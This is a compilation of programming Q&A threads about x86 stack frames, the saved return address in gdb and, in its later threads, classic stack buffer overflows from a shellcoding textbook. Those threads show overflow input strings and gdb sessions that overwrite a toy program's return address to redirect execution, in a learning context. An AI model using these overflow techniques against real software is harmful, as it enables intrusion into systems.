How do I calculate the address of the stored EIP - c

As the title says, I am trying to obtain the address of the stored EIP in the frame.
For this simple program:
func1(int a, int b)
{
int x = 1;
}
int main(void)
{
func1(1,2);
}
My gdb disassembly is:
(gdb) disassemble main
Dump of assembler code for function main:
0x08048430 <main+0>: push %ebp
0x08048431 <main+1>: mov %esp,%ebp
0x08048433 <main+3>: sub $0x8,%esp
0x08048436 <main+6>: add $0xfffffff8,%esp
0x08048439 <main+9>: push $0x2
0x0804843b <main+11>: push $0x1
0x0804843d <main+13>: call 0x8048410 <func1>
0x08048442 <main+18>: add $0x10,%esp
0x08048445 <main+21>: mov %ebp,%esp
0x08048447 <main+23>: pop %ebp
0x08048448 <main+24>: ret
End of assembler dump.
Stack frame printed from GDB:
(gdb) info frame
Stack level 0, frame at 0xffbfdda0:
eip = 0x8048416 in func1 (t.c:3); saved eip 0x8048442
called by frame at 0xffbfddc0
source language c.
Arglist at 0xffbfdd98, args: a=1, b=2
Locals at 0xffbfdd98, Previous frame's sp is 0xffbfdda0
Saved registers:
ebp at 0xffbfdd98, eip at 0xffbfdd9c
info frame doesn't provide the address of the saved eip, it just shows the value of the save eip.
I setup a break point on func1, then printed the frame information. The saved EIP has a value of 0x8048442, which corresponds to in the disassembly. I am confused, how do I calculate the address of where EIP(0x8048442) is located?
i have examined the address 0x8048412(0x8048416 - 4), but it doesn't contain the saved EIP address.

You need to examine the area before the arg list. It tells you that: eip at 0xffbfdd9c.
This address is 4 bytes before the arg list - 0xffbfdd98. Remember that the list grows down so "4 bytes before x" means "x+4".
The saved eip 0x8048442 info is about where does the EIP points to, which is in the text section, not in the stack.

Related

Contents of stack after function call

I'm reading a book that explains how the ebp and eip registers work when a function is called. The following figure is provided:
here array is a local function variable. The function arguments are a, and b. This is how the actual C code looks like:
#include <stdio.h>
void function(int a, int b)
{
int array[8];
}
int main()
{
function(1,2);
return 0;
}
I compile with gcc -m32 -g function.c and run the program in gdb. The command disas main shows (skipped some lines):
0x08048474 : push $0x2
0x08048476 : push $0x1
0x08048478 : call 0x804843b
0x0804847d : add $0x10,%esp
the first and last few instructions of function() are:
0x0804843b : push %ebp
0x0804843c : mov %esp,%ebp
0x0804843e : sub $0x38,%esp
0x08048441 : mov %gs:0x14,%eax
0x08048447 : mov %eax,-0xc(%ebp)
0x0804844a : xor %eax,%eax
0x0804844c : nop
...
0x0804845e : leave
0x0804845f : ret
and when I inspect the contents of ebp:
(gdb) x/4xw $ebp
0xffffcd48: 0xffffcd68 0x0804847d 0x00000001 0x00000002
I understand that in the stack, ebp should be followed by the return location 0x0804847d and the function arguments 0x00000001 and 0x00000002. However I don't know what is 0xffffcd68. Is this the address of ebp?
It is the value of ebp at the beginning of the function.
It's a consequence of push %ebp and the fact that the x86 stack is Full Descending.
It's the caller frame pointer.
Beware that the compilers update the way they handle the stack much more frequently than books authors do with their books.
Particularly: alignment, frame-pointer omission, RVO, implicit parameters and so on may throw you off.

RSP points not to the top of the stack?

I have a problem understanding how the stack works. First my little code:
void func1 ( int z ) {
int i = 1;
}
int main ( ) {
func1 ( 89 );
return 0;
}
I am using:
Ubuntu 16.04 64-bit,
gcc version 5.4.0,
gdb version 7.11.1.
I was debugging with GDB, to see how the compiler pushes function arguments on the stack.
When I examine the stack at the point of the where RSP points, I get this:
(gdb) x/10xw $rsp
0x7fffffffdf20: 0xffffdf30 0x00007fff 0x00400525 0x00000000
0x7fffffffdf30: 0x00400530 0x00000000 0xf7a2e830 0x00007fff
0x7fffffffdf40: 0x00000000 0x00000000
When I print out the address of newest created variable, I get this:
(gdb) p &i
$4 = (int *) 0x7fffffffdf14
When I print out the address of the variable, which was hand over to the function, I get this:
(gdb) p &z
$5 = (int *) 0x7fffffffdf0c
The stack is growing to lower numbers.
So I thought that RSP always points to the top of the stack, meaning that when I i call this command x/10xw $rsp I am able to see all the variables from the function, but I can't see them from there.
The first address after this command is way higher than the address of the variable z. Because of that I was guessing that RSP points not on the top of the stack.
What is also wondering me, is that the address of i is higher than the address of z.
Since i were later pushed to the stack than z, i must be a lower address than z in my opinion.
I hope someone can explain me why this is so.
EDIT: I have found the answer!
It was an optimization from the compiler. In func1() the RSP register had not pointed to the "top" of the stack because it was not necessary. It were just necessary if in func1() a other function were called. So the compiler saw that and didn't decrement the RSP register.
Here ismy assembler code with no function call in func1():
0x00000000004004d6 <+0>: push rbp
0x00000000004004d7 <+1>: mov rbp,rsp
0x00000000004004de <+8>: mov DWORD PTR [rbp-0x14],edi
0x00000000004004e1 <+11>: mov DWORD PTR [rbp-0x4],0x1
0x00000000004004e8 <+18>: mov eax,0x0
0x00000000004004f3 <+29>: leave
0x00000000004004f4 <+30>: ret
So you can see no SUB call for decrementing RSP.
Now the code from func1() with a function call:
0x00000000004004d6 <+0>: push rbp
0x00000000004004d7 <+1>: mov rbp,rsp
0x00000000004004da <+4>: sub rsp,0x20
0x00000000004004de <+8>: mov DWORD PTR [rbp-0x14],edi
0x00000000004004e1 <+11>: mov DWORD PTR [rbp-0x4],0x1
0x00000000004004e8 <+18>: mov eax,0x0
0x00000000004004ed <+23>: call 0x4004f5 <func2>
0x00000000004004f2 <+28>: nop
0x00000000004004f3 <+29>: leave
0x00000000004004f4 <+30>: ret
So you can see the SUB call for decrementing RSP. So RSP can point to the "top".
The convention on x86 is that the stack grows "downwards" towards decreasing addresses.
The "top" of the stack is simply the location where something was most recently pushed; it's not based on the relative values of the addresses. A stack can grow "upwards" or "downwards" in the address space - heck, for some implementations (such as a linked list), the addresses don't even have to be sequential.
This page has a fair explanation with diagrams.

Debugging C program (int declaration)

I'm still learning assembly and C, but now, I'm trying to understand how the compiler works. I have here a simple code:
int sub()
{
return 0xBEEF;
}
main()
{
int a=10;
sub();
}
Now I know already how the CPU works, jumping into the frames and subroutines etc.
What i don't understand is where the program "store" their local variables. In this case in the main's frame?
Here is the main frame on debugger:
0x080483f6 <+0>: push %ebp
0x080483f7 <+1>: mov %esp,%ebp
0x080483f9 <+3>: sub $0x10,%esp
=> 0x080483fc <+6>: movl $0xa,-0x4(%ebp)
0x08048403 <+13>: call 0x80483ec <sub>
0x08048408 <+18>: leave
0x08048409 <+19>: ret
I have in "int a=10;" a break point that's why the the offset 6 have that arrow.
So, the main's function starts like the others pushing the ebp bla bla bla, and then i don't understand this:
0x080483f9 <+3>: sub $0x10,%esp
=> 0x080483fc <+6>: movl $0xa,-0x4(%ebp)
why is doing sub in esp? is the variable 'a' on the stack with the offset -0x4 of the stack pointer?
just to clear the ideas here :D
Thanks in advance!
0x080483f9 <+3>: sub $0x10,%esp
You will find such an instruction in every function. Its purpose is to create a stack frame of the appropriate size so that the function can store its locals (remember that the stack grows backward!).
The stack frame is a little too big in this case. This is because gcc (starting from 2.96) pads stack frames to 16 bytes boundaries by default to account for SSEx instructions which require packed 128-bit vectors to be aligned to 16 bytes. (reference here).
=> 0x080483fc <+6>: movl $0xa,-0x4(%ebp)
This line is initializing a to the correct value (0xa = 10d). Locals are always referred with an offset relative to ebp, which marks the beginning of the stack frame (which is therefore included between ebp and esp).

stack overflow (shellcoders handbook)

I was taking at this example w.r.t. shellcoder's handbook(second edition), and have some question about the stack
root#bt:~/pentest# gdb -q sc
Reading symbols from /root/pentest/sc...done.
(gdb) set disassembly-flavor intel
(gdb) list
1 void ret_input(void){
2 char array[30];
3
4 gets(array);
5 printf("%s\n", array);
6 }
7 main(){
8 ret_input();
9
10 return 0;
(gdb) disas ret_input
Dump of assembler code for function ret_input:
0x08048414 <+0>: push ebp
0x08048415 <+1>: mov ebp,esp
0x08048417 <+3>: sub esp,0x24
0x0804841a <+6>: lea eax,[ebp-0x1e]
0x0804841d <+9>: mov DWORD PTR [esp],eax
0x08048420 <+12>: call 0x804832c <gets#plt>
0x08048425 <+17>: lea eax,[ebp-0x1e]
0x08048428 <+20>: mov DWORD PTR [esp],eax
0x0804842b <+23>: call 0x804834c <puts#plt>
0x08048430 <+28>: leave
0x08048431 <+29>: ret
End of assembler dump.
(gdb) break *0x08048420
Breakpoint 1 at 0x8048420: file sc.c, line 4.
(gdb) break *0x08048431
Breakpoint 2 at 0x8048431: file sc.c, line 6.
(gdb) run
Starting program: /root/pentest/sc
Breakpoint 1, 0x08048420 in ret_input () at sc.c:4
4 gets(array);
(gdb) x/20x $esp
0xbffff51c: 0xbffff522 0xb7fca324 0xb7fc9ff4 0x08048460
0xbffff52c: 0xbffff548 0xb7ea34a5 0xb7ff1030 0x0804846b
0xbffff53c: 0xb7fc9ff4 0xbffff548 0x0804843a 0xbffff5c8
0xbffff54c: 0xb7e8abd6 0x00000001 0xbffff5f4 0xbffff5fc
0xbffff55c: 0xb7fe1858 0xbffff5b0 0xffffffff 0xb7ffeff4
(gdb) continue
Continuing.
AAAAAAAAAABBBBBBBBBBCCCCCCCCCCDDDDDDDD
AAAAAAAAAABBBBBBBBBBCCCCCCCCCCDDDDDDDD
Breakpoint 2, 0x08048431 in ret_input () at sc.c:6
6 }
(gdb) x/20x 0x0bffff51c
0xbffff51c: 0xbffff522 0x4141a324 0x41414141 0x41414141
0xbffff52c: 0x42424242 0x42424242 0x43434242 0x43434343
0xbffff53c: 0x43434343 0x44444444 0x44444444 0xbffff500
0xbffff54c: 0xb7e8abd6 0x00000001 0xbffff5f4 0xbffff5fc
0xbffff55c: 0xb7fe1858 0xbffff5b0 0xffffffff 0xb7ffeff4
(gdb) ^Z
[1]+ Stopped gdb -q sc
root#bt:~/pentest# printf "AAAAAAAAAABBBBBBBBBBCCCCCCCCCCDDDD\x35\x84\x04\x08" | ./sc
AAAAAAAAAABBBBBBBBBBCCCCCCCCCCDDDD5�
AAAAAAAAAABBBBBBBBBBCCCCCCCCCCDDDD:�
root#bt:~/pentest#
in this example i was taking 48 bytes "AAAAAAAAAABBBBBBBBBBCCCCCCCCCCDDDD\x35\x84\x04\x08" that to rewrite ret address, and all is work. But when i tried to use example from first edition of this book, i faced with some problem
root#bt:~/pentest# gdb -q sc
Reading symbols from /root/pentest/sc...done.
(gdb) disas ret_input
Dump of assembler code for function ret_input:
0x08048414 <+0>: push %ebp
0x08048415 <+1>: mov %esp,%ebp
0x08048417 <+3>: sub $0x24,%esp
0x0804841a <+6>: lea -0x1e(%ebp),%eax
0x0804841d <+9>: mov %eax,(%esp)
0x08048420 <+12>: call 0x804832c <gets#plt>
0x08048425 <+17>: lea -0x1e(%ebp),%eax
0x08048428 <+20>: mov %eax,(%esp)
0x0804842b <+23>: call 0x804834c <puts#plt>
0x08048430 <+28>: leave
0x08048431 <+29>: ret
End of assembler dump.
(gdb)
why program has taken 24(hex)=36(dec)bytes for array, but i used 48 that rewrite, 36 bytes of array, 8 bytes of esp and ebp(how i know), but there are steel have 4 unexplained bytes
ok, lets try out the sploit from first edition of book who rewrite all of array by address of call function, in book they had "sub &0x20,%esp" so code is
main(){
int i=0;
char stuffing[44];
for (i=0;i<=40;i+=4)
*(long *) &stuffing[i] = 0x080484bb;
puts(array);
i have ""sub &0x24,%esp" so my code will be
main(){
int i=0;
char stuffing[48];
for (i=0;i<=44;i+=4)
*(long *) &stuffing[i] = 0x08048435;
puts(array);
result of the shellcoders' handbook
[root#localhost /]# (./adress_to_char;cat) | ./overflow
input
""""""""""""""""""a<u___.input
input
input
and my result
root#bt:~/pentest# (./ad_to_ch;cat) | ./sc
5�h���ل$���������h����4��0��˄
inout
Segmentation fault
root#bt:~/pentest#
What's problem?
i was compiling with
-fno-stack-protector -mpreferred-stack-boundary=2
I suggest you better get the amount of bytes necessary to overflow the buffer by trying in GDB. I compiled the source you provided in your question and ran it through GDB:
gdb$ r < <(python -c "print('A'*30)")
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
[Inferior 1 (process 29912) exited normally]
(Do note that I use Python to create my input instead of a compiled C program. It really does not matter, use what you prefer.)
So 30 bytes are fine. Let's try some more:
gdb$ r < <(python -c "print('A'*50)")
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Program received signal SIGSEGV, Segmentation fault.
Cannot access memory at address 0x41414141
0x41414141 in ?? ()
gdb$ i r $eip
eip 0x41414141 0x41414141
Our eip register now contains 0x41414141, which is AAAA in ASCII. Now, we can gradually check where exactly we have to place the value in our buffer that updates eip:
gdb$ r < <(python -c "print('A'*40+'BBBB')")
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBB
Program received signal SIGSEGV, Segmentation fault.
Cannot access memory at address 0x8004242
0x08004242 in ?? ()
B is 0x42. Thus, we overwrote half of eip when using 40 A's and four B's. Therefore, we pad with 42 A's and then put the value we want to update eip with:
gdb$ r < <(python -c "print('A'*42+'BBBB')")
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBB
Program received signal SIGSEGV, Segmentation fault.
Cannot access memory at address 0x42424242
0x42424242 in ?? ()
We got full control over eip! Let's try it. Set a breakpoint at the end of ret_input (your addresses may vary as I recompiled the binary):
gdb$ dis ret_input
Dump of assembler code for function ret_input:
0x08048404 <+0>: push %ebp
0x08048405 <+1>: mov %esp,%ebp
0x08048407 <+3>: sub $0x38,%esp
0x0804840a <+6>: lea -0x26(%ebp),%eax
0x0804840d <+9>: mov %eax,(%esp)
0x08048410 <+12>: call 0x8048310 <gets#plt>
0x08048415 <+17>: lea -0x26(%ebp),%eax
0x08048418 <+20>: mov %eax,(%esp)
0x0804841b <+23>: call 0x8048320 <puts#plt>
0x08048420 <+28>: leave
0x08048421 <+29>: ret
End of assembler dump.
gdb$ break *0x8048421
Breakpoint 1 at 0x8048421
As an example, let's modify eip so once returning from ret_input we end up at the beginning of the function again:
gdb$ r < <(python -c "print('A'*42+'\x04\x84\x04\x08')")
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA�
--------------------------------------------------------------------------[code]
=> 0x8048421 <ret_input+29>: ret
0x8048422 <main>: push ebp
0x8048423 <main+1>: mov ebp,esp
0x8048425 <main+3>: and esp,0xfffffff0
0x8048428 <main+6>: call 0x8048404 <ret_input>
0x804842d <main+11>: mov eax,0x0
0x8048432 <main+16>: leave
0x8048433 <main+17>: ret
--------------------------------------------------------------------------------
Breakpoint 1, 0x08048421 in ret_input ()
We pad 42 A's and then append the address of ret_input to our buffer. Our breakpoint on the ret triggers.
gdb$ x/w $esp
0xffffd30c: 0x08048404
On top of the stack there's the last DWORD of our buffer - ret_input's address.
gdb$ n
0x08048404 in ret_input ()
gdb$ i r $eip
eip 0x8048404 0x8048404 <ret_input>
Executing the next instruction pops that value off the stack and sets eip accordingly.
On a side note: I recommend the .gdbinit file from this guy.
This row :
for (i=o;i<=44;i+=4);
Remove the ; from the end. I also assume that the o(letter o) instead of 0(zero) is mistyped here.
The problem is that your for loop is executing ; (a.k.a. do nothing) until i becomes larger then 44, and then you execute the next command with i = 44 wich is outside the bounds of array and you get Segmentation Error. You should watch out for this type of error as it is hardly visible and it is completely valid c code.

EIP value incorrect during buffer overflow

I am working on ubuntu 12.04 and 64 bit machine. I was reading a good book on buffer overflows and while playing with one example found one strange moment.
I have this really simple C code:
void getInput (void){
char array[8];
gets (array);
printf("%s\n", array);
}
main() {
getInput();
return 0;
}
in the file overflow.c
I compile it with 32 bit flag cause all example in the book assumed 32 bit machine, I do it like this
gcc -fno-stack-protector -g -m32 -o ./overflow ./overflow.c
In the code char array was only 8 bytes but looking at disassembly I found that that array starts 16 bytes away from saved EBP on the stack, so I executed this line:
printf "aaaaaaaaaaaaaaaaaaaa\x10\x10\x10\x20" | ./overflow
And got:
aaaaaaaaaaaaaaaaaaaa
Segmentation fault (core dumped)
Then I opened core file:
gdb ./overflow core
#0 0x20101010 in ?? ()
(gdb) info registers
eax 0x19 25
ecx 0xffffffff -1
edx 0xf77118b8 -143583048
ebx 0xf770fff4 -143589388
esp 0xffef6370 0xffef6370
ebp 0x61616161 0x61616161
esi 0x0 0
edi 0x0 0
eip 0x20101010 0x20101010
As you see EIP in fact got new value, which I wanted. BUT when I want to put some useful values like this 0x08048410
printf "aaaaaaaaaaaaaaaaaaaa\x10\x84\x04\x08" | ./overflow
Program crashes as usual but than something strange happens when I'm trying to observe the value in EIP register:
#0 0xf765be1f in ?? () from /lib/i386-linux-gnu/libc.so.6
(gdb) info registers
eax 0x61616151 1633771857
ecx 0xf77828c4 -143120188
edx 0x1 1
ebx 0xf7780ff4 -143126540
esp 0xff92dffc 0xff92dffc
ebp 0x61616161 0x61616161
esi 0x0 0
edi 0x0 0
eip 0xf765be1f 0xf765be1f
Suddenly EIP start to look like this 0xf765be1f, it doesn't look like 0x08048410. In fact I noticed that it's enough to put any hexadecimal value starting from 0 to get this crumbled EIP value. Do you know why this might happen? Is it because I'm on 64 bit machine?
UPD
Well guys in comments asked for more information, here is the disassembly of getInput function:
(gdb) disas getInput
Dump of assembler code for function getInput:
0x08048404 <+0>: push %ebp
0x08048405 <+1>: mov %esp,%ebp
0x08048407 <+3>: sub $0x28,%esp
0x0804840a <+6>: lea -0x10(%ebp),%eax
0x0804840d <+9>: mov %eax,(%esp)
0x08048410 <+12>: call 0x8048310 <gets#plt>
0x08048415 <+17>: lea -0x10(%ebp),%eax
0x08048418 <+20>: mov %eax,(%esp)
0x0804841b <+23>: call 0x8048320 <puts#plt>
0x08048420 <+28>: leave
0x08048421 <+29>: ret
Perhaps code at 0x08048410 was executed, and jumped to the area of 0xf765be1f.
What's in this address? I guess it's a function (libC?), so you can examine its assembly code and see what it would do.
Also note that in the successful run, you managed to overrun EBP, not EIP. EBP contains 0x61616161, which is aaaa, and EIP contains 0x20101010, which is \n\n\n. It seems like the corrupt EBP indirectly got EIP corrupt.
Try to make the overrun 4 bytes longer, and then it should overrun the return address too.
This is probably due to the fact that modern OS (Linux does at least, I don't know about Windows) and modern libc have mechanisms that do not allow code found in stack to be executed.
Buffer overflow is invoking undefined behavior, therefore anything can happen. Theorizing what might happen is futile.

Resources